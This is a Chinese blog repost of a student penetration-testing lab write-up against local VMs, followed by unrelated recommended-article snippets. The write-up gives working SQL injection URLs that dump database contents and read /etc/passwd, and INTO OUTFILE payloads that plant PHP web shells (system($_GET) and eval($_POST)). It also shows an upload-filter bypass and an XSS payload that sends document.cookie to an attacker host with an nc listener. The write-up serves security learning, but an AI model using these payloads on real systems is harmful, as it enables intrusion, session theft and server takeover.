experiment 5

最新推荐文章于 2024-10-10 11:21:08 发布
最新推荐文章于 2024-10-10 11:21:08 发布
阅读量112 收藏
点赞数
文章标签: php shell 数据库
原文链接:http://www.cnblogs.com/P201521410042/p/8898120.html
版权

SQLi

发现可能的注入点

 

尝试验证注入

根据

http://192.168.35.128/cat.php?id=1' or 1=1%23 发现报错,说明此处非字符型注入

 

http://192.168.35.128/cat.php?id=1 and 1=1 正常显示

 

http://192.168.35.128/cat.php?id=1 and 1=2 无显示

说明此处有注入点并且为数字型注入

 

 

http://192.168.35.128/cat.php?id=1 order by 4时正常显示

 

http://192.168.35.128/cat.php?id=1 order by 5时报错

 

说明当前表中只有4个字段

 

找出显示的字段

 

 有显示的字段为2

 

得到数据库名

得到表名

 

得到字段名

 

得到数据

 

后台登录传马,发现过滤php,换成大写成功getshell

 

 

 

 

 

 

XSS(没有bot只能手动模拟登陆)

 找到可能的XSS漏洞点

测试漏洞是否存在

alert1成功弹窗,说明存在漏洞

写入攻击代码,并在本地设置监听

<script>document.write('<img src="http://192.168.243.133/?'+document.cookie+' "/>');</script>

nc -lvnp 80

管理员登录后得到管理员的cookie信息

带着cookie访问该网页(此处可以用控制台document.cookie="xx"实现),成功以管理员登录

之后寻找注入点

 验证

and 1=1 正常显示

and 1=2 无显示

说明存在sql注入

order by 发现有4个字段

找出显示位 http://192.168.243.135/admin/edit.php?id=2%20and%201=2%20union%20select%201,2,3,4

发现2和3是显示位

读取passwd  http://192.168.243.135/admin/edit.php?id=2%20and%201=2%20union%20select%201,2,load_file(%22/etc/passwd%22),4

读取shadow 时无回显 可能是权限不够

 

寻找暴露的目录信息,尝试写入

http://192.168.179.130/admin/edit.php?id=0%20union%20select%201,2,3,4%20into%20outfile%20%22/var/www/classes/test.php%22

访问时404可能是没有写权限

 

尝试其他目录(源码中有css目录)

 再尝试写入,访问发现有回显

ok,这个目录可以利用了,基本可以为所欲为了

写入命令执行 

http://192.168.243.135/admin/edit.php?id=0%20union%20select%201,2,%22%3C?php%20system($_GET[%27a%27]);%20?%3E%22,4%20into%20outfile%20%22/var/www/css/test.php%22

 

写入一句话

http://192.168.243.135/admin/edit.php?id=0%20union%20select%201,2,%22%3C?php%20@eval($_POST[%27a%27]);%20?%3E%22,4%20into%20outfile%20%22/var/www/css/test4.php%22

 成功拿到shell

 

转载于:https://www.cnblogs.com/P201521410042/p/8898120.html

ayg39372
关注
9.10. Experimental features
BLOG域名:programb.blog.csdn.net
04-27 2761
9.10.1. SubTasks The “Subtasks” feature is an experimental feature in the task service. This feature allows one task to have sub-tasks in a parent-child relationship. The parent task can auto-complete...
vscode中experimentaldecorators报错
马优晨
06-06 6019
使用vscode编辑器出现,experimentaldecorators报错。 解决方案: 第一步: 在配置文件中添加 { "javascript.implicitProjectConfig.experimentalDecorators": true } 第二步: 项目根目录下创建一个jsconfig.json文件,添加如下内容: { "compi...
experiment 2
weixin_30539835的博客
05-02 116
192.168.31.129为FTP服务器 192.168.31.130为攻击机 192.168.31.131为访问者 ARP欺骗 欺骗前 欺骗后 数据包信息 FTP嗅探 获取用户名和密码 FTP-DATA为传输的数据 查看该TCP流 导出原始数据即可 转载于:https://www.cnblogs.com/P20152141...
OS experiment
weixin_72529512的博客
04-04 120
【代码】OS experiment
SDN Experiment 1
qq_45358498的博客
05-09 811
SDN Experiment 1 计算机85 李汪才 2181411909 实验环境 ⽹络模拟器 Mininet 控制器 Ryu 抓包⼯具 Wireshark 实验过程 运⾏及抓包如下 mininet按如下命令⽣成3个交换机连接线性拓扑,控制器设为remote sudo mn --topo linear,3 --controller remote 将上⾯代码保存为 simple_switch.py ,启动控制器 sudo ryu-manager simple_switch.py
experiment 3
Vtanghulu的博客
12-02 345
“借鉴”来的答案 package experiment3; import java.util.Scanner; public class A { public static void main(String[] args) { Scanner sca = new Scanner(System.in); String str = sca.next(); int n=size (str...
MQTT experiment
Baron_wu的博客
03-31 1239
On a Linux or OS X machine, install Mosquitto (http://mosquitto.org/). You will need the server (broker) as well as the clients (publisher and subscriber). You do NOT need to compile from sources On Linux use your distribution’s standard package management
什么是消融实验(Ablation experiment) 深度学习 YOLOv5
“365天深度学习训练营”报名进行中~
12-23 6637
有一点像控制变量的感觉。 因为作者提出了一种方案,同时改变了多个条件/参数,他在接下去的消融实验中,会一一控制一个条件/参数不变,来看看结果,到底是哪个条件/参数对结果的影响更大。 ...
DataBase Experiment HW06
JamSlade的博客
11-27 270
(提示:使用account表,rollup操作,这里年份是指LAST_ACTIVITY_DATE)。创建函数getParemp_id(),实现用迭代输出某个employee(emp_id为函数输入)的所有上级领导id(superior_emp_id),用‘|’隔开。1). 创建视图tmp_gt,要求查询所有金融产品属性(product_cd)的余额大于80000的账户信息(account表)。2). 以下两条是插入视图tmp_gt的SQL语句,请判断是否能正确插入数据到视图和基本表中,并简要解释原因。
实验5 编写矩阵类实验
A_lonly的博客
12-14 1418
编写矩阵类实验 5.Matrix。该类包括矩阵数据数组double data[ ][ ],构造方法Matrix()、Matrix(int rows,int cols)、Matrix(double data[ ][ ])、获取某元素值的方法getData(int row,int col)、设置某元素值的方法setData(int row,int col,double value)、计算两个矩阵的乘积的方法multiply(Matrix m)以及equals ( )、toString( )等内容; 编写测试类实
java实现雪花飘落源码-Experiment5:实验5
06-05
Experiment5 实验目的 掌握字符串String及其方法的使用 掌握文件的读取/写入方法 掌握异常处理结构 实验要求 基本要求 在某课上,学生要提交实验结果,该结果存储在一个文本文件A中。 文件A包括两部分内容: 一是学生...
Experiment5.pdsprj
11-22
Experiment5.pdsprj
Experiment 5 ChatGLM Deployment.md
10-12
Experiment 5 ChatGLM Deployment.md
Experiment5_单片机_设置启动_秒表_
09-30
在这个实验"Experiment5_单片机_设置启动_秒表_"中,我们将探讨如何利用单片机实现一个基本的秒表功能,包括启动、清零、暂停以及通过串口通信传输数据。 首先,单片机的秒表功能通常基于定时器/计数器模块来实现。...
Experiment 5(ogr yollanan).rar_Bartlett_windowing method
07-14
bartlett blackman and rectengular filter window codea
sql注入第8关
m0_74741186的博客
10-08 492
CTFHub_技能树_Web之SQL注入——布尔盲注详细原理讲解_保姆级手把手讲解自动化布尔盲注脚本编写_ctfhub布尔盲注-CSDN博客。id=1' and length(database())=1--+ //查询数据库名字的长度。上一关是可以直接写入文件,试了一下这一关也是可以直接写入后门代码,然后用蚁剑去连接。但是这关的目的一个是让我们使用布尔注入,内容来自这,具体看这篇文章。那就只能用布尔盲注了,因为错误返回错误页面,正确返回正确页面。报错不提示报错信息,不适宜用报错注入,
Qualitor checkAcesso.php 任意文件上传漏洞复现(CVE-2024-44849)
0xSec
10-09 161
​Qualitor 8.24及之前版本存在任意文件上传漏洞,未经身份验证远程攻击者可利用该漏洞代码执行,写入WebShell,进一步控制服务器权限。
【FastAdmin】全栈视角下的页面跳转实现:从原生html、javascrpt、php技术到jQuery、FastAdmin框架
田辛_DensinTian的专栏
10-09 721
页面跳转是Web开发中的基本操作,不同的技术栈提供了不同的实现方法。本文将详细介绍在原生JavaScript、原生HTML、原生PHP、jQuery以及FastAdmin框架中实现页面跳转的各种方法,并分析每种方法的优势、劣势和适用场景。
PHP智慧餐饮新风尚点餐系统
最新发布
2401_84593614的博客
10-10 487
总的来说,智慧餐饮新风尚点餐系统不仅为顾客带来了便捷、高效、个性化的点餐体验,也为餐厅提供了有力的运营支持。它让美食与科技实现了完美结合,让我们在享受美食的同时,也能感受到科技的魅力。如果你还没有尝试过这款点餐系统,不妨找个机会去体验一下,相信它会给你带来不一样的惊喜!
experiment 5 europe by rail代码
10-22
experiment 5 europe by rail代码是一个旅行计划,基于铁路交通的方式在欧洲进行探险和探索。这个计划的代码是为了方便旅行者们能够在欧洲境内的地方之间自由地旅行,借助欧洲发达的铁路网络。 这个计划的代码涉及多个方面。首先,它会提供欧洲各个国家之间的最佳铁路路线,以确保旅行者们能够快速、便捷地到达目的地。它会考虑到不同国家之间的距离、交通状况和时间,以优化旅行路线并减少时间浪费。 其次,这个代码还会为旅行者们提供关于每个城市的详细信息。它会包括各个城市的历史、文化、风景名胜和当地特色,以帮助旅行者更好地了解和规划他们的旅行。 此外,这个代码还会提供有关订票、票价和时间表的信息。它可以帮助旅行者预订适合他们时间和预算的火车票,并提供最新的票价和时刻表,以确保旅行者能够得到最准确和实时的信息。 最后,这个代码还会包括旅行者们可能需要的其他信息,如旅行保险、当地交通和住宿选择等。它可以为旅行者提供相关的建议和推荐,以确保他们能够在旅途中得到充分的保障和便利。 总结来说,experiment 5 europe by rail代码是一个为旅行者们提供欧洲铁路旅行计划的代码。它会提供最佳的路线、详细的城市信息、准确的票价和时刻表,以及其他旅行者可能需要的相关信息。通过这个代码,旅行者们可以方便地探索欧洲各个国家,并享受到丰富多样的旅行体验。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值